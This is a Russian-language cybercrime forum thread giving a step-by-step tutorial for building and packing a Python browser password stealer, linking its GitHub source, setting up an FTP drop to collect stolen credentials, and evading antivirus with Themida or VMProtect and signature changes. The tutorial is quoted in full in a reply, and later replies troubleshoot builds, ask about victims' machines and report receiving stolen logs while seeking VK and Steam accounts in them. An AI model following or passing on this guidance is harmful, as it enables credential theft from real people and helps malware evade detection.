• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Стиллер паролей + Крипт.

mixa264

Авторитет
Реакции
2.117
0 руб.
И мы сделаем свой стиллер. Сделать собственный стиллер достаточно легко если ты знаешь хотя бы какой то язык программирования, но для тех кто их не учит я тоже подкину плюшку.

Давайте в этой статье попробуем создать НОРМАЛЬНЫЙ стиллер на Python и криптовать его по мере необходимости. Как это сделать я объясню в видео и в этой статье расскажу как он работает вкратце.

Видос:

Необходимое:
Скачать проект стиллера с Github: https://github.com/Enot272/Simple_Stealer_for_Chrome

Скачать и Установить:
Cкачать Пайтон: https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi
https://yadi.sk/d/Telw_qtL3TBgdd
Cкачать C++ либы для Пайтон: https://www.microsoft.com/en-us/download/details.aspx?id=44266
Выйти из сеанса и снова зайти в него (!) что бы Пайтон добавился в переменные окружения

Перейти в папку со стиллером и открыть в ней командную строку (зажимаем shift > клик правой кнопкой мыши > открыть окно команд)
Дальше установим в Пайтон необходимые библиотеки:
Код:
pip install -r biblio.txt

Так же нам необходимо заиметь себе в пользование FTP хостинг, я пользую Ucoz (да он говно), о том как работать с ним и какие данные вводить не пропустите в видосе.

Открываем Билдер и вносим данные хостинга, а так же вводим ключ шифрования. Нажимаем кнопку (она там одна) и получаем в папке Dist готовый стиллер.

Сервер должен быть указан как: sНОМЕР.ucoz.net (где найти его номер в видео)
Имя пользователя FTP выдаст юкоз в вкладке инструменты (видео)
Пароль указывать тоже обязательно там же.

Иконку можете заменить на свою, только она должна называться - 'pic.ico'. По сути мы получаем криптованый файл, который не будет похож на все остальные стиллеры, которые появятся в данной статье. Лучше конечно накрывать сборку Темидой или Вмпротектом, а так же добавлять свои функции для изменения сигнатур данного файла.

Подробнее о работе этого стиллера вы можете почитать в файле base.py я туда добавил комментарии. Вы можете поддержать проект кодом и добавление новых функций, а так же поделиться своими вопросами в комментариях этой статьи, а не в личных сообщениях.

Браузеры: chrome, yandex, opera, vivaldi, amigo, kometa, orbitum, comodo, torch

Вообщем, всё, пока!

МОЯ СТАТЬЯ

UPD: Перекачайте проект с гитхаба, был пофиксен небольшой, но все таки баг.

UPD2: Обновляшка пришла. Как оказалось разрабы убрали одну библиотеку из стандартных. Причем вообще и мне об этом не сообщили. Теперь будет слегка неудобно - айпи в этой версии не будет приписан к файлам. Но добавил Iplogger на всякий случай. В файл biblio.txt добавлена деобходимая библиотека, доустановите, если чё. Аминь.

Если у вас не получилось, то вы можете сделать так как в ролике ниже и прислать мне ответ что не так и мы придумаем решение:

Автор

Последнее редактирование:

Yagura

Мерцающая тень

Yagura

Мерцающая тень
Резидент
Реакции
292
0 руб.
Telegram
И мы сделаем свой стиллер. Сделать собственный стиллер достаточно легко если ты знаешь хотя бы какой то язык программирования, но для тех кто их не учит я тоже подкину плюшку.

Давайте в этой статье попробуем создать НОРМАЛЬНЫЙ стиллер на Python и криптовать его по мере необходимости. Как это сделать я объясню в видео и в этой статье расскажу как он работает вкратце.

Видос:

Необходимое:
Скачать проект стиллера с Github: https://github.com/Enot272/Simple_Stealer_for_Chrome

Скачать и Установить:
Cкачать Пайтон: https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi
https://yadi.sk/d/Telw_qtL3TBgdd
Cкачать C++ либы для Пайтон: https://www.microsoft.com/en-us/download/details.aspx?id=44266
Выйти из сеанса и снова зайти в него (!) что бы Пайтон добавился в переменные окружения

Перейти в папку со стиллером и открыть в ней командную строку (зажимаем shift > клик правой кнопкой мыши > открыть окно команд)
Дальше установим в Пайтон необходимые библиотеки:
Код:

Так же нам необходимо заиметь себе в пользование FTP хостинг, я пользую Ucoz (да он говно), о том как работать с ним и какие данные вводить не пропустите в видосе.

Открываем Билдер и вносим данные хостинга, а так же вводим ключ шифрования. Нажимаем кнопку (она там одна) и получаем в папке Dist готовый стиллер.

Сервер должен быть указан как: sНОМЕР.ucoz.net (где найти его номер в видео)
Имя пользователя FTP выдаст юкоз в вкладке инструменты (видео)
Пароль указывать тоже обязательно там же.

Иконку можете заменить на свою, только она должна называться - 'pic.ico'. По сути мы получаем криптованый файл, который не будет похож на все остальные стиллеры, которые появятся в данной статье. Лучше конечно накрывать сборку Темидой или Вмпротектом, а так же добавлять свои функции для изменения сигнатур данного файла.

Подробнее о работе этого стиллера вы можете почитать в файле base.py я туда добавил комментарии. Вы можете поддержать проект кодом и добавление новых функций, а так же поделиться своими вопросами в комментариях этой статьи, а не в личных сообщениях.

Браузеры: chrome, yandex, opera, vivaldi, amigo, kometa, orbitum, comodo, torch

Вообщем, всё, пока!

МОЯ СТАТЬЯ

UPD: Перекачайте проект с гитхаба, был пофиксен небольшой, но все таки баг.

UPD2: Обновляшка пришла. Как оказалось разрабы убрали одну библиотеку из стандартных. Причем вообще и мне об этом не сообщили. Теперь будет слегка неудобно - айпи в этой версии не будет приписан к файлам. Но добавил Iplogger на всякий случай. В файл biblio.txt добавлена деобходимая библиотека, доустановите, если чё. Аминь.

Если у вас не получилось, то вы можете сделать так как в ролике ниже и прислать мне ответ что не так и мы придумаем решение:

Автор
Мишаня как всегда годное запилил)

ATAR1

Местный
Реакции
61
0 руб.
Telegram
Енотик ^_^

danaforevr

питонист

danaforevr

питонист
Резидент
Реакции
516
0 руб.
Нужен ли для запуска стиллера установленный пайтон на компе жертвы?

GJE7

Участник
Реакции
27
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
Здравствуй. Сделал все по инструкции, но все равно проблема.
Пишет : "Failed to execute script stiller"
UPD. Поменял пароль на FTP и скомпилировал по новой :
3b0982fdb302b93179b7a047296cba7c.png

Sweeet

Цифровой сантехник

Sweeet

Цифровой сантехник
Резидент
Реакции
381
0 руб.
Странно вот, почему много хороших проектов пишут под Питон 2.7 а не 3.6

Moriarty

Местный
Реакции
232
777 руб.
Telegram
Jabber
Не все что ново - обязательно совершенно. 2.7 Проверен и отлажен в процессе долгой эсплуатации.
Хотя кто я такой. Чтобы об этом судить. Просто моя догадка)

danaforevr

питонист

danaforevr

питонист
Резидент
Реакции
516
0 руб.
Не все что ново - обязательно совершенно. 2.7 Проверен и отлажен в процессе долгой эсплуатации.
Хотя кто я такой. Чтобы об этом судить. Просто моя догадка)
Я думаю из-за того,что для компиляции Python3 в exe ты будешь танцевать с бубном очень долго)

Tishe

Резидент
Реакции
234
0 руб.
Здравствуй. Сделал все по инструкции, но все равно проблема.
Пишет : "Failed to execute script stiller"
UPD. Поменял пароль на FTP и скомпилировал по новой :
3b0982fdb302b93179b7a047296cba7c.png

Ну что нашел причину данной проблемы ?
Потому как у меня такая же беда :D

danaforevr

питонист

danaforevr

питонист
Резидент
Реакции
516
0 руб.
В чем может быть проблема ?
Юзай обновленные файлы из гитхаба и установи библиотеку
Код:
+ отключи антивирь на время.
Если не получиться,то пробуй делать все по видео.
*Конечно же не реклама)*

zHd4

Местный
Реакции
82
0 руб.
Telegram
пока будем юзать для таких целей питон, будут и прблемы.
Лучше использовать здесь C++, C# или Java

vitalya878

Участник
Реакции
2
0 руб.
Все работает, логи приходят, спасибо)
Как можно со всех этих блокнотов, найти мне нужные? допустим вк или стим аккаунт?

zHd4

Местный
Реакции
82
0 руб.
Telegram
Потому, что питон 3.6 появился позже, чем 2.7. И никто не хочет переписывать старое и изучать новое. По мне так лучше питон от 3.0 - 3.5.

pirat-ru

Местный
Реакции
85
0 руб.
Потому как прога на 2.7 без проблем запускается на винде начиная с XP, а 3.6 на XP не работает. Там добавлены новые библиотеки которые на ранних версиях винды не работают. Просто 2.7 универсальнее получается. Но 3.6 по любому удобнее.

Сверху Снизу